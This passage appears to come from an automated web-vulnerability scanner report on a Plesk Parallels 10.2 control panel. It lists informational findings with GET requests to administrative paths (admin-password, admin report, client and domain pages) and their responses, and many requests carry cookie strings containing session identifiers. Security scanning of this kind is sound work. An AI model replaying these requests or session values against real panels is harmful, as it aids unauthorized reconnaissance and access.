"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.135. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/img/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /img/

Request

GET /img/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=service-plans; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:16:01 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.136. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/img/icons/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /img/icons/

Request

GET /img/icons/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=service-plans; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:16:01 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.137. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/img/icons/small/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /img/icons/small/

Request

GET /img/icons/small/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=service-plans; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:16:01 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.138. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/img/icons/small/subscription-status-  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /img/icons/small/subscription-status-

Request

GET /img/icons/small/subscription-status- HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:20:21 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.139. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /javascript/

Request

GET /javascript/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=1e33734a9713ad69de63c483f7f5d471; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Expires: Sun, 23 Oct 2011 19:41:21 GMT
Cache-Control: max-age=2592000
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:41:21 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.140. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /left.php3

Request

GET /left.php3 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: psaContext=dashboard; PHPSESSID=af8b59293ecdef34dd27eb4277f6c86f; locale=en-US

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 23 Sep 2011 18:35:18 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 18:35:18 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.141. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /license.php3

Request

GET /license.php3 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=0b237ea12b7edacbf865b7dcdce30fae; locale=en-US

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 23 Sep 2011 18:24:09 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 18:24:09 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.142. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/overview/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /overview/

Request

GET /overview/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=service-plans; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:16:01 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.143. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/overview/id/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /overview/id/

Request

GET /overview/id/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:20:23 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.144. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/

Request

GET /plesk/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=service-plans; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 14:43:13 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:43:13 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.145. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/admin-info/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/admin-info/

Request

GET /plesk/admin-info/?context=personal-info HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=tools

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 23 Sep 2011 19:13:51 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:13:51 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.146. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/admin-panel=home.admin/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/admin-panel=home.admin/

Request

GET /plesk/admin-panel=home.admin/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/admin-info/?context=personal-info
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PHPSESSID=1e055d692666ff89dbd6ff3abc9ce4fc; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Fri, 23 Sep 2011 19:16:21 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:16:21 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.147. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/admin-panel=home.reseller/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/admin-panel=home.reseller/

Request

GET /plesk/admin-panel=home.reseller/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 14:44:21 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:44:21 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.148. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/admin-password/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/admin-password/

Request

GET /plesk/admin-password/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Fri, 23 Sep 2011 19:19:45 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:19:45 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.149. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/admin/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/admin/

Request

GET /plesk/admin/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=service-plans; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 14:42:54 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:42:54 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.150. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/admin/report  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/admin/report

Request

GET /plesk/admin/report HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Fri, 23 Sep 2011 19:19:48 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:19:48 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.151. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@2/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/client@2/

Request

GET /plesk/client@2/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; psaContext=personal-info; PHPSESSID=7203632a9a010a5b09a3ec1de15b3691; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 12:16:00 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 12:16:00 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.152. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@2/domain@1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/client@2/domain@1/

Request

GET /plesk/client@2/domain@1/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
